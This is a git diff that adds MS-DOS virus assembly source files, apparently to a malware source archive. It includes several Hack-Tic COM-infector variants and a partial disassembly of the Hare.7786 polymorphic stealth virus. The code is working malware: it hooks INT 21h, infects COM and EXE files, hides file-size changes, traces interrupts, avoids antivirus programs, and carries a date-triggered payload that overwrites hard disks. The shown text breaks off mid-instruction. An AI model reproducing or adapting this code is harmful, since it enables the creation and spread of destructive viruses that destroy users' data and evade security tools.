H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.hack-res.asm b/MSDOS/Virus.MSDOS.Unknown.hack-res.asm new file mode 100644 index 00000000..3dd8dbc4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hack-res.asm @@ -0,0 +1,83 @@ +tic segment + org 100h + assume cs:tic, ds:tic, es:tic +; +len equ offset int21-100h ;LENGTH OF VIRUS CODE +; +start: mov ax,9000h ;MOVE VIRUS CODE UP + mov es,ax + mov di,si + mov cx,len + rep movsb + mov ds,cx ;DS = 0 + mov si,84h ;INT 21 VECTOR + mov di,offset int21 + push di + mov dx,offset infect + lodsw ;SAVE ORIGINAL VECTOR + cmp ax,dx ;VIRUS PROBABLY ALREADY RESIDENT + je exit + stosw + lodsw + stosw + push es + pop ds + mov ax,2521h ;REVECTOR TO VIRUS + int 21h +exit: push cs ;RESTORE SEGMENT REGISTERS + pop ds + push cs + pop es + pop si ;SI = END OF VIRUS CODE + mov di,0fch + push di ;RETURN HERE + mov ax,0aaach ;LODSB/STOSB INSTRUCTIONS + stosw + mov ax,0fce2h ;LOOP TO ADDRESS INSTRUCTIONS + stosw + mov ch,0feh + ret ;MOVE CODE AND RUN PROGRAM +; +infect: pushf + push ax + push cx + push dx + push si + push ds + cmp ah,40h ;WRITE FUNC? + jne done + cmp bx,1 + je mes + mov si,dx ;DS:DX = WRITE BUFFER + lodsb + cmp al,0b8h ;ALREADY INFECTED? + je done + cmp al,0ebh ;PROBABLY .COM + jne done + mov cx,len ;LENGTH OF VIRUS + mov dh,1 ;DX ASSUMED TO BE 0 +hack: push cs + pop ds + pushf + call cs:[int21] ;WRITE VIRUS +done: pop ds + pop si + pop dx + pop cx + pop ax + popf ;CONTINUE INTERRUPT + jmp cs:[int21] +mes: mov cx,12 + mov dx,offset string + jmp short hack +string db ' (H*ck-tic) ' +; +int21 dd 0c3h ;STANDALONE VIRUS RETURNS +tic ends + end start + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.hacktic.asm b/MSDOS/Virus.MSDOS.Unknown.hacktic.asm new file mode 100644 index 00000000..f182ebec --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hacktic.asm @@ -0,0 +1,70 @@ +tic segment + org 100h + assume cs:tic, ds:tic, es:tic + +len equ offset last-100h + +start: mov si,0100h + push si + mov ax,cs + add ah,10h + mov es,ax + xor di,di + mov cx,len + rep movsb + mov dx,0FE00h + mov ah,1Ah + int 21h + mov dx,offset file + mov ah,4Eh + jmp short find +retry: mov ah,3Eh + int 21h + mov ah,4Fh +find: push cs + pop ds + int 21h + mov cx,0FE1Eh + jc nofile + mov dx,cx + mov ax,3D02h + int 21h + xchg ax,bx + push es + pop ds + mov dx,di + mov ah,3Fh + int 21h + add ax,len + cmp byte ptr [di], 0BEh + je retry + push ax + xor cx,cx + mov ax,4200h + cwd + int 21h + pop cx + mov ah,40h + int 21h + jmp short retry + +nofile: push cs + pop es + mov bl,0FCh + mov [bx],0AAACh + mov [bx+2],0FCE2h + pop di + push bx + ret + +file db '*.COM',0 +last db 0C3h + +tic ends + end start + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.hacktic2.asm b/MSDOS/Virus.MSDOS.Unknown.hacktic2.asm new file mode 100644 index 00000000..bed2f459 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hacktic2.asm @@ -0,0 +1,63 @@ +tic segment + org 100h + assume cs:tic, ds:tic, es:tic +; +len equ offset last-100h ;LENGTH OF VIRUS CODE +; +start: mov bx,0fh ;KLUDGE TO AVOID MEMALLOC ERROR + mov ah,4ah + int 21h + mov dx,es + add dh,10h + mov es,dx ;PROGRAM CODE WILL RUN HERE + push dx ;SET UP FOR FAR RETURN + push si + mov ah,26h ;CREATE NEW PSP + int 21h + mov di,si + mov si,offset last + push si + mov ch,0feh + rep movsb ;MOVE PROGRAM CODE UP + dec cx ;=FFFF + pop di + mov dx,offset file + mov ah,4eh ;FIND FIRST .COM FILE + jmp short find +retry: mov ah,4fh ;FIND NEXT +find: int 21h + jc nofile ;NO (MORE) FILES + mov dx,9eh ;FILE NAME IN DTA + mov ax,3d02h ;OPEN FILE + int 21h + xchg ax,bx ;1-BYTE MOVE OF AXBX + mov dx,di ;END OF VIRUS CODE + mov ah,3fh ;READ FILE DATA (CX=FFFF) + int 21h ;READ FILE AFTER VIRUS CODE + add ax,len ;LENGTH OF VIRUS+FILE + cmp byte ptr [di],0bbh ;CHECK IF ALREADY INFECTED + je retry ;TRY AGAIN + push ax + xor cx,cx + mov ax,4200h ;RESET FILE POINTER + cwd ;DX=0 + int 21h + pop cx + mov dh,1 + mov ah,40h ;WRITE INFECTED CODE BACK + int 21h +; +nofile: push es ;GO RUN PROGRAM + pop ds + retf +; +file db '*.COM',0 ;SEARCH FOR .COM FILES +last db 0c3h ;STANDALONE VIRUS CODE JUST RETURNS +tic ends + end start + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.hare.asm b/MSDOS/Virus.MSDOS.Unknown.hare.asm new file mode 100644 index 00000000..b25e96e7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hare.asm @@ -0,0 +1,5548 @@ +;============================================================================ +; +; HDEuthanasia-v3 by Demon Emperor. +; +; Disassembly of the Hare.7786 virus. +; +; Source: 103k +; +; Disassembly was done by T-2000 / Invaders. +; +; April 1998 / May 1998. +; +; Very stupid written! MUCH double, triple code, unstructured programming, +; different variables used. +; +; Full stealth polymorphic multipartite virus. +; +; +; I guess da source is 70% reconstructed, the rest is kinda hard to do, +; So I don't think that I will complete it (I got better things tha do). +; Also please don't blame me for the pretty lame disassembly, I released +; it only Bcoz I haven't seen any other disasms of Hare. I U decide to +; finish the rest of the disassembly, I would appreciate if U gave me a +; copy. +; +; Demon Emperor seems to have a great knowledge about Win95, he introduced +; several interresting techniques. It's a shame though, that the virus +; has a bunch of shortcomings, these are: +; +; - It doesn't pad the polymorphic code (different filesizes). +; - Shoddy programming: It could loose a lot of weight (bytes), if +; the author has used flexible routines. +; +; +; Some improvements: +; +; - INT 16h: also hook INT 10h, and don't allow writes to the screen, +; turn-off PC-speaker. +; +; +; +; TARGETS: 1st harddisk & 1.44M diskettes. +; PAYLOAD: Message & disktrashing. +; ENCRYPTION: Slow polymorphic. +; STATUS: In the wild. +; +; +; Assemble with TASM 3.2 (or compatible). +; +; TASM hare.asm /m +; +; *** = Bug report/remark (actually too many to write down). +; +;============================================================================ + + +; The following equates show data references outside the range of the program. + +DATA_24E EQU 7C16H ;* +DATA_25E EQU 7DBEH ;* +Virus_Size EQU (OFFSET Virus_End - OFFSET Virus_Begin) + + + .MODEL TINY ; (hmmm... not really!). + .STACK 1024 + .CODE + +Virus_Begin: +START: + + MOV SI, 0 ; Delta offset. + ORG $-2 +Padding DW 0 + + CLD + STI + + MOV CX, 0F2Ch ; Decrypt second layer. + MOV DI, OFFSET Layer_2 ; (slightly polymorphic). + ADD DI, SI +Decrypt_2: + ;NOT WORD PTR CS:[DI] + nop + nop +Key_2: nop + + INC DI + INC DI + LOOP Decrypt_2 +Layer_2: + MOV AX, 0FE23h ; Residency-check. + INT 21h + + CMP AX, 0Dh ; Are we already resident? + + PUSH SI + PUSH DS + + JNE Decrypt_Layer_3 + + JMP Exec_Host + +Decrypt_Layer_3: + + MOV AL, 0 + ORG $-1 +Key_3 DB 0 + OR AL, AL + JZ Make_Resident + + MOV AH, AL + ADD AH, 01h + MOV CX, 0E65h + MOV DI, OFFSET NewInt01h + ADD DI, SI + +LOCLOOP_6: + XOR CS:[DI], AX + INC DI + INC DI + ADD AL, 2 + ADD AH, 2 + LOOP LOCLOOP_6 + +Make_Resident: + INT 12h ; Get total DOS-memory in AX. + + MOV CL, 6 + SHL AX, CL ; Convert to segment-address. + + DEC AX + MOV ES, AX + + CMP ES:[8], 'CS' ; Systemcode? + JE Find_Last_MCB +LOC_8: + MOV AH, 52h ; Get list of lists. + INT 21h + + MOV AX, ES:[BX-2] ; Get 1st MCB. + +Find_Last_MCB: MOV ES, AX + + CMP BYTE PTR ES:[0], 'Z' ; Last block? + JE Last_MCB_Found + + MOV AX, ES:[3] ; Get total memory in MCB. + INC AX ; Plus size MCB (10h bytes). + MOV BX, ES + ADD AX, BX ; Current MCB + total mem. + JMP Find_Last_MCB + +Last_MCB_Found: + + MOV AX, ES:[3] ; Get total memory in MCB. + SUB AX, (8912 / 16) ; Subtract our needed mem. + JC LOC_8 + + MOV ES:[3], AX ; Put it back. + INC AX ; Plus size MCB. + MOV BX, ES + ADD AX, BX + MOV ES, AX + + POP DS ; DS:SI = Entrypoint virus. + POP SI + + PUSH SI + PUSH DS + + PUSH CS + POP DS + + MOV CX, Virus_Size ; Copy virus to virussegment. + XOR DI, DI + CLD + REP MOVSB + + PUSH ES ; JMP to relocated virus. + MOV AX, OFFSET Relocated + PUSH AX + RETF + +; +; 0 = No +; 1 = Yes +; +; Bits: +; 0 +; 1 Disable stealth. +; 2 Windows 95/NT running. +; 3 +; 4 +; 5 +; 6 +; 7 Windows 95/NT running. +; + +Relocated: + MOV CS:Flags, CL ; Clear Flags variable. + + MOV AX, 160Ah ; Identify Windows version + INT 2Fh ; and type. + + OR AX, AX ; Function accepted? + JNZ Bad_Windows + + CMP CX, 03h ; Enhanched version running? + JB Bad_Windows + + OR BYTE PTR CS:Flags, 10000000b + +Bad_Windows: CALL Check_Poly_Sector + CALL Infect_Harddisk + + PUSH CS + POP DS + + MOV AH, 52h ; List of lists. + INT 21h + + MOV AX, ES:[BX-2] ; Get 1st MCB in AX. + MOV First_MCB, AX ; Save it for the tracer. + + MOV BYTE PTR Trace_Function, 19h ; Get free diskspace. + MOV BYTE PTR Fake_PUSHF, 00h + MOV byte ptr Trace_Done, 01h + + MOV AX, 3521h ; Get address INT 21h. + INT 21h + + MOV Int21h, BX ; Save INT 21h. + MOV Int21h+2, ES + + MOV Trace_Int, BX ; Find entrypoint. + MOV Trace_Int+2, ES + CALL Tracer + + CLD ; Replace address INT 21h + MOV SI, OFFSET Trace_Int ; with traced address. + MOV DI, OFFSET Traced_Int21h + MOVSW + MOVSW + + XOR AX, AX ; Hook INT 21h. + MOV DS, AX + + MOV DS:[21h * 4], OFFSET NewInt21h + MOV DS:[21h * 4 + 2], CS + + CALL SUB_56 + CALL Del_PortDriver + + POP ES ; ES:DI = Virus entrypoint. + POP SI + + XOR SI, SI + + PUSH SI + PUSH ES + +Exec_Host: + POP ES + POP SI + + PUSH ES + POP DS + + PUSH DS + + CMP BYTE PTR CS:[SI+Host_Type], 01h + JE Exec_EXE + + ADD SI, OFFSET Old_Entry + MOV DI, 100h + PUSH DI + CLD + + PUSH CS + POP DS + + MOVSW ; Restore original 3 bytes + MOVSB ; in da .COM-file. + + PUSH ES + POP DS + CALL Clear_Registers + RETF + +Exec_EXE: + MOV AX, CS:[SI+Old_Entry+2] + POP BX + + ADD BX, 10h ; Plus size PSP. + ADD AX, BX ; Add effective segment. + MOV CS:[SI+JMP_Host+2], AX ; Store it in the code. + MOV AX, CS:[SI+Old_Entry] + + MOV CS:[SI+JMP_Host], AX + ADD CS:[SI+Old_Stack+2], BX + + CALL Clear_Registers ; Clear registers & flags. + + MOV SS, CS:[SI+Old_Stack+2] + MOV SP, CS:[SI+Old_Stack] + + + DB 0EAh ; JMP to host. +JMP_Host DW 0, 0 + +Traced_Int21h DW 0, 0 +Int21h DW 0, 0 + +JMP_COM DB 90h ; JMP to virus in .COM-file. + DW 0 + + +Host_COM_JMP: + +Old_Entry DW OFFSET Carrier, 0 +Old_Stack DW 0, 0 +Old_Mod512 DW 30h +Old_Byte_Pages DW 2 +FileTime DW 9AA0h +Host_Type DB 01h +Temp1 DW 1E6Ah, 3 +Trace_Int DW 9AA0h, 2498h +First_MCB DW 253h +Trace_Done DB 0 +Fake_PUSHF DB 0 +CodeSegment DW 0 +Int1Ch DW 0, 0 +Flags DB 0 +PSP_Segment DW 0 +Free_Clusters DW 0 +Trace_Function DB 3 + + +Clear_Registers: + + XOR AX, AX + + PUSH AX ; Clear all flags (also TF). + POPF + + STI + + MOV CX, AX ; Clear registers. + MOV DI, AX + MOV BP, AX + MOV DX, AX + MOV BX, AX + + RETN + + + +NewInt01h: + PUSH AX + PUSH BX + PUSH BP + PUSH DS + MOV BP, SP + + MOV AX, [BP+10] ; AX = CS. + MOV BX, [BP+08] ; BX = IP. + + MOV CS:CodeSegment, CS + + CMP AX, CS:CodeSegment + JE Exit_Int01h + + CALL Check_Opcode + + CMP AX, 0F000h + JNB LOC_14 + + CMP AX, CS:First_MCB ; In DOS-segment? + JA Exit_Int01h ; Continue tracing when not. +LOC_14: + AND CS:Trace_Done, 00000001b + JZ Exit_Int01h + + MOV CS:Trace_Done, 00h + MOV CS:Trace_Int+2, AX ; Store segment. + MOV AX, [BP+8] + MOV CS:Trace_Int, AX ; Store offset. + +Exit_Int01h: + POP DS + POP BP + POP BX + POP AX + + CMP CS:Fake_PUSHF, 1 + JE LOC_16 + + IRET + +LOC_16: + MOV CS:Fake_PUSHF, 0 + + RETF + + +Tracer: + MOV AX, 3501h ; Get INT 01h address. + INT 21h + + MOV Temp1, BX ; Save INT 01h address. + MOV Temp1+2, ES + MOV DX, OFFSET NewInt01h + + MOV AH, 25h ; Hook INT 01h. + INT 21h + + XOR DL, DL + + PUSHF + POP AX + OR AX, 100h ; Turn TF on. + PUSH AX + POPF + + MOV AH, Trace_Function + + PUSHF ; Trace the function. + CALL DWORD PTR Trace_Int + + PUSHF + POP AX + AND AX, NOT 100h ; Single-step mode off. + PUSH AX + POPF + + LDS DX, DWORD PTR Temp1 ; Restore INT 01h. + MOV AX, 2501h + INT 21h + + PUSH CS + PUSH CS + POP ES + POP DS + + RETN + +Check_Opcode: + PUSH AX + MOV DS, AX + MOV AL, [BX] + + CMP AL, 9Dh ; Next instruction POPF ? + JNE LOC_17 + + OR [BP+0CH], 100h ; Set TF in flags on stack. + JMP LOC_18 + NOP +LOC_17: + CMP AL,9Ch ; PUSHF ? + JNE LOC_18 + + INC WORD PTR [BP+8] + MOV CS:Fake_PUSHF,1 +LOC_18: + POP AX + RETN + + +SUB_4: + MOV AH, 04h ; Get clock. + INT 1Ah + + TEST DH, 00001000b + JZ Luck_4_User + + CMP DL, 22h ; Trigger-date? + JE Payload + +Luck_4_User: + RETN + +PayLoad: + MOV AX, 03h ; Clear the screen. + INT 10h + + MOV SI, OFFSET Message ; Display text. + MOV BH, 00h + MOV CX, 3Dh + +Display_Char: LODSB ; String [si] to al + MOV AH, 0Eh ; Display character. + INT 10h + + LOOP Display_Char + + MOV DL, 80h +LOC_22: + MOV BH, DL + XOR DL, 01h + + MOV AH, 08h ; Get disk drive parameters. + INT 13h + + AND CL, 00111111b ; 0 - 63. + MOV AL, CL + MOV AH, 03h + PUSH AX + MOV DL, BH + MOV AH, 08h + INT 13h ; Disk dl=drive 0 ah=func 08h + ; get drive parameters, bl=type + ; cx=cylinders, dh=max heads + AND CL, 00111111b ; 0 - 63. + MOV AL, CL + MOV AH, 03h + MOV DL, BH + MOV CX, 0101h + PUSH AX + MOV BP, SP +LOC_23: + PUSH DX +LOC_24: + TEST DL, 00000001b + JNZ LOC_25 + + MOV AX, [BP] + JMP LOC_26 +LOC_25: + MOV AX,[BP+2] +LOC_26: + INT 13h ; ??INT NON-STANDARD INTERRUPT + XOR DL, 01h + + DEC DH + JNZ LOC_24 + + POP DX + + INC CH + JNZ LOC_23 + + ADD CL, 40h + JNC LOC_23 + + ADD DL, 2 + ADD SP, 4 + + JMP LOC_22 + +; Calls the original INT 21h. + +Traced_i21h: + PUSHF + CALL DWORD PTR CS:Traced_Int21h + + RETN + +Stealth_DiskSpace: + + PUSH BX + PUSH AX + + MOV AH, 62h ; Get PSP-address. + CALL Traced_i21h + + POP AX + + CMP CS:PSP_Segment, BX + JNE LOC_28 + + CMP CS:Trace_Function, DL ; Drive. + JNE LOC_28 + + POP BX + POPF + + CALL Traced_i21h + MOV BX, CS:Free_Clusters ; Fake # of free clusters. + + RETF 2 + +LOC_28: + MOV CS:PSP_Segment, BX + MOV CS:Trace_Function, DL ; Save drive. + POP BX + POPF + CALL Traced_i21h ; Execute function. + + MOV CS:Free_Clusters, BX ; Genuine # of free clusters. + + RETF 2 + +Stealth_Filesize: + + CALL DWORD PTR CS:Int21h ; Execute function. + + PUSHF + PUSH AX + PUSH BX + PUSH ES + + TEST CS:Flags, 00000010b ; Stealth-Mode off? + JNZ Exit_Size_Stealth ; Then no file-stealth. + + OR AL, AL ; No error occurred? + JNZ Exit_Size_Stealth ; Else exit. + + MOV AH, 2Fh ; Get DTA-address. + CALL Traced_i21h + + CMP CS:Function_i21h, 40h ; FCB/Dir ? + JA Dir_Stealth + + OR WORD PTR ES:[BX+26h], 0 + JNZ LOC_30 + + CMP ES:[BX+24h], 1E9Ch + JB Exit_Size_Stealth +LOC_30: + MOV AX, ES:[BX+1Eh] + AND AL, 00011111b ; Erase all but seconds. + + CMP AL, 00010001b ; 34 seconds? + JNE Exit_Size_Stealth + + SUB WORD PTR ES:[BX+24h], (Virus_Size + 70) + SBB WORD PTR ES:[BX+26h], 0 + + JMP Exit_Size_Stealth + +Dir_Stealth: + OR WORD PTR ES:[BX+1Ch], 0 + JNZ LOC_32 + + CMP ES:[BX+1Ah], 1E9Ch + JB Exit_Size_Stealth +LOC_32: + MOV AX,ES:[BX+16h] ; Get time in AX. + AND AL, 00011111b + + CMP AL, 00010001b ; 34 seconds? + JNE Exit_Size_Stealth + + SUB WORD PTR ES:[BX+1AH], (Virus_Size + 70) + SBB WORD PTR ES:[BX+1CH], 0 + +Exit_Size_Stealth: + + POP ES + POP BX + POP AX + POPF + + RETF 2 + + +Size_Stealth: MOV CS:Function_i21h, AH ; Save function #. + JMP Stealth_Filesize + +Function_i21h DB 4Eh + +Residency_Check: + MOV AX, 0Dh ; Return our sign. + POPF + + RETF 2 + +NewInt21h: + PUSHF + + CMP AX, 0FE23h ; Residency-check. + JE Residency_Check + + CMP AH, 36h ; Get free diskspace. + JNE Check_Next_3 + + JMP Stealth_DiskSpace +Check_Next_3: + CMP AH, 4Ch ; Program terminate. + JE Check_PSP_Infect + + CMP AH, 31h ; Terminate & stay resident. + JE Check_PSP_Infect + + CMP AH, 00h ; Terminate program. + JE Check_PSP_Infect + + CMP AX, 4B00h ; Program execute. + JNE Check_Next_4 + + CALL Infect_Exec +Check_Next_4: + CMP AH, 11h ; Findfirst (FCB). + JE Size_Stealth + + CMP AH, 12h ; Findnext (FCB). + JE Size_Stealth + + CMP AH, 4Eh ; Findfirst (handle). + JE Size_Stealth + + CMP AH, 4Fh ; Findnext (handle). + JE Size_Stealth + + CMP AH, 3Dh ; Open file (handle). + JNE Check_Next_5 + + CALL Clean_File + +Check_Next_5: + CMP AH, 3Eh ; Close file (handle). + JNE LOC_39 + + POPF + CALL Infect_Close + + RETF 2 ; Return to caller. +LOC_39: + POPF + JMP DWORD PTR CS:Int21h + +Check_PSP_Infect: + AND CS:Flags, 00000100b + + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH DI + PUSH ES + PUSH DS + + MOV AH, 62h ; Get PSP. + CALL Traced_i21h + JC Exit_PSP_Check + + CLD + MOV ES, BX + MOV ES, ES:[2Ch] + XOR DI, DI + MOV AL, 00h +LOC_41: + MOV CX, 0FFFFh + REPNE SCASB + + CMP ES:[DI], AL + JNE LOC_41 + + ADD DI, 03h + MOV DX, DI + + PUSH ES + POP DS + + MOV AX, 3D00h ; Open file... + CALL Traced_i21h + JC Exit_PSP_Check + + MOV BX, AX ; And infect it on closing. + CALL Infect_Close + +Exit_PSP_Check: + + POP DS + POP ES + POP DI + POP DX + POP CX + POP BX + POP AX + POPF + + JMP DWORD PTR CS:Traced_Int21h + + +; AX = 4B00h + +Infect_Exec: + PUSH AX ; Save registers. + PUSH BX + PUSH CX + PUSH DX + PUSH ES + PUSH DS + PUSH DI + PUSH SI + + CALL Check_To_Del_Driver + CALL Set_Dummy_Handlers + CALL Save_FileAttr + CALL Check_FileName + + PUSHF + PUSH DS + + PUSH CS + POP DS + + MOV DI, 0 + ORG $-2 +Gaby1 DW OFFSET FileName1 + MOV SI, OFFSET FileName2 + + ADD BX, 04h + MOV CX, BX + REP MOVSB + + POP DS + POPF + JC Exit_Infect_Exec ; Special file? + + MOV AX, 3D02h ; Open file r/w. + CALL Traced_i21h + + XCHG BX, AX ; BX = Filehandle. + CALL Save_FileTime + MOV AX, CS:Trace_Int ; Get filetime. + AND AL, 00011111b ; Mask seconds. + PUSH AX + + MOV AH, 3Fh ; Read header. + MOV CX, 28 + + PUSH CS + POP DS + + PUSH DS + POP ES + + MOV DX, OFFSET Buffer + CALL Traced_i21h + + MOV SI, DX + CLD + LODSW ; Get 1st word from header. + + CMP AX, 'ZM' ; True .EXE-file? + JE Is_EXE + + CMP AX, 'MZ' ; True .EXE-file? + JNE Is_COM ; Else it's a .COM-file. + +Is_EXE: + POP AX ; POP filetime. + + TEST Flags, 00000100b + JZ LOC_44 + + CMP AL, 11h + JE LOC_47 + + CALL Infect_EXE + JNC LOC_46 + + JMP Exit_Infect_Exec +LOC_44: + CMP AL, 11h + JNE LOC_47 + + CALL SUB_41 + JNC LOC_47 + + JMP Exit_Infect_Exec + +Is_COM: + POP AX ; AX = Filetime. + + CMP AL, 11h ; 34 seconds, infected? + JE Exit_Infect_Exec + + CALL Infect_COM + JC LOC_47 +LOC_46: + MOV AX, Trace_Int ; Set infected timestamp. + AND AL, 11100000b + OR AL, 11h ; 34 seconds. + MOV Trace_Int, AX +LOC_47: + CALL Restore_FileTime + +Exit_Infect_Exec: + + MOV AH, 3Eh ; Close file. + CALL Traced_i21h + + CALL Restore_FileAttr + CALL Restore_Dummy_Handlers + + POP SI ; Restore registers. + POP DI + POP DS + POP ES + POP DX + POP CX + POP BX + POP AX + + RETN + + +; Checks if INT 13h part is resident, and deletes portdriver if so. + +Check_To_Del_Driver: + + CALL Del_PortDriver + + MOV AX, 160Ah ; Identify Windows version + INT 2Fh ; and type. + + OR AX, AX ; Legal function? + JNZ Exit_Del_PortDriver + + CMP BH, 04h ; Windows ver. 4 or higher? + JB Exit_Del_PortDriver + + MOV AX, 5445h ; INT 13h residency-check. + INT 13h + + CMP AX, 4554h ; INT 13h part installed? + JNE Exit_Del_PortDriver + + CALL Del_PortDriver + JC LOC_49 ; File not found? + + RETN +LOC_49: + CALL Unslice_Int13h + +Exit_Del_PortDriver: + + RETN + + + +Infect_EXE: + CMP Reloc_Offs, 40h ; PE-header? + JNE LOC_52 + + STC +LOC_51: + JMP Exit_Infect_EXE +LOC_52: + MOV DI, OFFSET Old_Entry ; Save old CS:IP. + MOV SI, OFFSET Init_IP + + MOVSW + MOVSW + + MOV SI, OFFSET Init_SS ; Save old SS:SP. + MOV DI, OFFSET Old_Stack+2 + MOVSW + SUB DI, 04h + MOVSW + + MOV SI, DX ; Buffer. + MOV Host_Type, 01h ; Host is .EXE-file. + + CALL Check_Infect ; Suitable for infection? + JC LOC_51 ; CF set if not. + + MOV AX, Trace_Int ; Save time. + MOV FileTime, AX + + MOV AX, [SI+2] ; Filesize MOD 512. + MOV Old_Mod512, AX + + MOV AX, [SI+4] ; File in 512-byte pages. + MOV Old_Byte_Pages, AX + + MOV AX, [SI+4] ; + MOV DX, 512 + + CMP WORD PTR [SI+2], 0 ; No rounding? + JE LOC_53 + + DEC AX ; +LOC_53: + MUL DX ; Calculate filesize. + MOV Temp1+2, DX + MOV DX, [SI+2] + ADD AX, DX ; Plus filesize MOD 512. + ADC Temp1+2, 00h + MOV Temp1, AX + + PUSH AX + + XOR CX, CX ; Go to end of file. + MOV DX, CX ; DX:AX = Filesize. + MOV AX, 4202h + CALL Traced_i21h + + SUB AX, Temp1 ; Same size as in header? + JZ Good_Size_Lo ; (ie. no internal overlay?). + + POP AX + STC + + JMP Exit_Infect_EXE + +Good_Size_Lo: + SUB DX, Temp1+2 ; Same size as in header? + JZ Good_Size_Hi + + POP AX + STC + + JMP Exit_Infect_EXE + +Good_Size_Hi: + POP AX ; Filesize low. + MOV CX, Temp1+2 ; Filesize high. + MOV DX, AX + MOV AX, 4200h ; Go to end file. + CALL Traced_i21h + + MOV AX, 1E7Bh + MOV DX, [SI+2] ; Filesize MOD 512. + ADD DX, AX +LOC_56: + INC WORD PTR [SI+4] ; Filesize in 512-byte pages. + SUB DX, 512 + + CMP DX, 512 + JA LOC_56 + + JNE LOC_57 + XOR DX, DX +LOC_57: + MOV [SI+2], DX + + MOV AX, [SI+8] ; Size header in paragraphs. + MOV CX, 16 + MUL CX ; Calculate headersize bytes. + + MOV CX, Temp1 ; Filesize minus headersize. + SUB CX, AX + SBB Temp1+2, DX + + MOV DI, Temp1+2 ; Filesize high. + MOV SI, CX ; Filesize low. + + MOV DX, DI + MOV AX, SI + MOV CX, 16 + DIV CX ; Filesize DIV 16. + + MOV DI, AX + MOV SI, DX + + MOV Host_Entrypoint, SI + MOV Padding, SI ; 0 - 15 bytes padding. + + ADD SI, OFFSET Buffer ; Plus end of virus. + MOV Temp1, SI + MOV Temp1+2, DI + + CLD ; Set host's new entrypoint. + MOV SI, OFFSET Temp1 + MOV DI, OFFSET Init_IP + + MOVSW + MOVSW + + CALL Poly_Engine ; Polymorphic encryptor. + JC Exit_Infect_EXE + + XOR CX, CX ; Go to start of file. + MOV DX, CX + MOV AX, 4200h + CALL Traced_i21h + + CALL Make_Random_Stack + + MOV DX, OFFSET Buffer ; Write updated header. + MOV AH, 40h + MOV CX, 28 + CALL Traced_i21h + +Exit_Infect_EXE: + + RETN + + + +Infect_COM: + MOV Host_Type, 00h ; Set host as .COM-file. + CLD + MOV DI, OFFSET Host_COM_JMP + MOV SI, OFFSET Buffer + CALL Check_Infect ; Suitable for infection? + JC LOC_59 + + MOV CX, 3 ; Copy first 3 bytes of host + REP MOVSB ; to our storage-place. + + MOV DX, CX ; Go to end of file. + MOV AX, 4202h ; DX:AX = Filesize. + CALL Traced_i21h + + OR DX, DX ; File under 64k? + JZ LOC_60 +LOC_59: + STC + JMP Exit_Infect_COM +LOC_60: + CMP AX, 30 ; File too small? + JB LOC_59 + + XOR CX, CX ; Go to end of file. + MOV DX, CX ; DX:AX = Filesize. + MOV AX, 4202h + CALL Traced_i21h + + CMP AX, 55701 ; File too big? + JB LOC_61 + + STC ; Set carry-flag (error). + JMP Exit_Infect_COM + +LOC_61: + MOV Host_Entrypoint, AX + ADD Host_Entrypoint, 100h + MOV Padding, AX ; Virus entrypoint. + ADD Padding, 100h ; Plus .COM-entrypoint. + + MOV DI, OFFSET JMP_COM + MOV BYTE PTR [DI], 0E9h ; JMP opcode. + SUB AX, 3 ; Minus displacement. + ADD AX, Virus_Size ; Plus entrypoint. + MOV [DI+1], AX ; Store it. + + CALL Poly_Engine ; Append polymorphic copy. + JC Exit_Infect_COM + + XOR CX, CX ; Go to start file. + MOV DX, CX + MOV AX, 4200h + CALL Traced_i21h + + MOV CX, 3 ; Write JMP Virus to start + MOV DX, OFFSET JMP_COM ; of .COM-file. + MOV AH, 40h + CALL Traced_i21h + +Exit_Infect_COM: + + RETN + + +Save_FileTime: + MOV AX, 5700h ; Get filetime. + CALL Traced_i21h + MOV CS:Trace_Int, CX + MOV CS:Trace_Int+2, DX + + RETN + + +; Guess what...!? +Restore_FileTime: + + MOV AX, 5701h ; Set timestamp. + MOV CX, CS:Trace_Int + MOV DX, CS:Trace_Int+2 + CALL Traced_i21h + + RETN + + + +; +; Saves file attributes, and clears them afterwards. +; In: BX = Filehandle. +; +Save_FileAttr: + MOV AX, 4300h ; Get file-attributes. + CALL Traced_i21h + + MOV CS:CodeSegment, CX + MOV AX, 4301h ; Clear file-attributes. + XOR CX, CX + CALL Traced_i21h + + RETN + + +Restore_FileAttr: + + MOV AX, 4301h ; Set file-attributes. + MOV CX, CS:CodeSegment + CALL Traced_i21h + + RETN + +SUB_14: + PUSH DS + + PUSH CS + POP DS + + CLD + MOV SI, OFFSET FileName2 + SUB BX, 4 + JC LOC_63 + + MOV AX, [SI] + + CMP AX, 'BT' ; TBAV utilities? + STC + JE LOC_63 + + CMP AX, '-F' ; F-Prot? + JE LOC_65 + + CMP AX, 'VI' ; Invircible? + JE LOC_65 + + CMP AX, 'HC' ; CHKDSK.EXE ? + JE LOC_64 + + MOV AL, 'V' ; Filename contains a 'V' ? + MOV DI,OFFSET FileName2 + MOV CX, BX + INC CX + REPNE SCASB + + OR CX, CX ; Found? + STC + JNZ LOC_63 ; Then exit with carry set. + + MOV DI, OFFSET FileName2 ; Filename is COMMAND.* ? + MOV SI, OFFSET Command_Com + MOV CX, BX + REPE CMPSB + + OR CX, CX ; Found? + STC + JZ LOC_63 ; Then exit with carry set. + CLC +LOC_63: + POP DS + RETN +LOC_64: + OR Flags, 00000010b + POP DS + RETN +LOC_65: + OR Flags, 00000001b + STC + POP DS + + RETN + + + +Check_FileName: + PUSH DS + POP ES + + XOR AL, AL + MOV DI, DX + XOR CX, CX + MOV CL, 0FFh + MOV BX, CX + CLD + REPNE SCASB ; Find end of ASCIIZ-string. + + DEC DI + DEC DI + SUB BX, CX + MOV CX, BX + STD + MOV AL, '\' + REPNE SCASB ; Find start filename. + + SUB BX, CX + MOV CX, BX + INC DI + MOV AL,ES:[DI] + + CMP AL, '\' + JNE LOC_66 + + INC DI + MOV SI, DI + MOV DI, 